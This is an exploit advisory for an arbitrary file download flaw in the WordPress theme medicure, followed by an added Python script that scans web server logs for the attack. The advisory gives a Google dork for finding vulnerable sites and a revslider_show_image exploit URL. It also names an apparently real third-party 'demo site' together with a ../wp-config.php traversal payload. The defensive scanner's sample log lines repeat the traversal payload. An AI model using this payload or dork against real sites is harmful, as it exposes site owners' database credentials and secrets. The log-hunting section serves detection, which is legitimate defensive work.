
WordPress Theme medicure Arbitrary File Download Vulnerability

Author: Daya iLLi, Published: 07-11-2014
Exploit Title : WordPress Theme medicure Arbitrary File Download Vulnerability

Exploit Author : Daya iLLi

Date : 07/11/2014

Google Dork : inurl:"inurl:/wp-content/themes/medicure/"

Tested on : Linux, Windows 7

--------------------------------------------------------------

The WordPress theme medicure suffers from an arbitrary file download vulnerability.

Exploit : http://127.0.0.1/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]

Demo Sites :

http://www.blackhillspediatrics.com//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
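
For defenders, the request pattern above can be hunted in web server access logs. The following Python script is an added example, not part of the original advisory; the combined log format, the constructed sample entries, and the rule that legitimate `img` values end in an image extension are assumptions.

```python
import re
from urllib.parse import parse_qs

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")

# Constructed sample entries (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Nov/2014:10:01:02 +0000] "GET //wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3021',
    '198.51.100.4 - - [07/Nov/2014:10:01:09 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=uploads/slide1.jpg HTTP/1.1" 200 48211',
    '203.0.113.9 - - [07/Nov/2014:10:02:30 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=%2e%2e%2fwp-config.php HTTP/1.1" 200 3021',
    '198.51.100.4 - - [07/Nov/2014:10:03:00 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=heartbeat HTTP/1.1" 200 58',
]

def img_problem(value):
    """Return why an img value is suspicious, or None for a plain image path."""
    norm = value.replace("\\", "/").lower()
    if "../" in norm or norm.startswith("/"):
        return "path traversal or absolute path"
    if not norm.endswith(IMAGE_EXT):
        return "non-image file requested"
    return None

def scan(lines):
    """Return (client_ip, img, reason) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        # Split by hand: urlsplit() would read a leading "//" as a host name.
        path, _, query = (m.group(1) if m else "").partition("?")
        if not path.endswith("/wp-admin/admin-ajax.php"):
            continue
        params = parse_qs(query)  # percent-decodes each value once
        if "revslider_show_image" not in params.get("action", []):
            continue
        for img in params.get("img", []):
            reason = img_problem(img)
            if reason:
                hits.append((line.split()[0], img, reason))
    return hits

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A hit with status 200 and a response size that matches the size of `wp-config.php` on disk indicates the file was served, in which case the database credentials and salts it contains should be rotated.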

=============================================
Contact: http://www.facebook.com/DayaIlli.Officiel
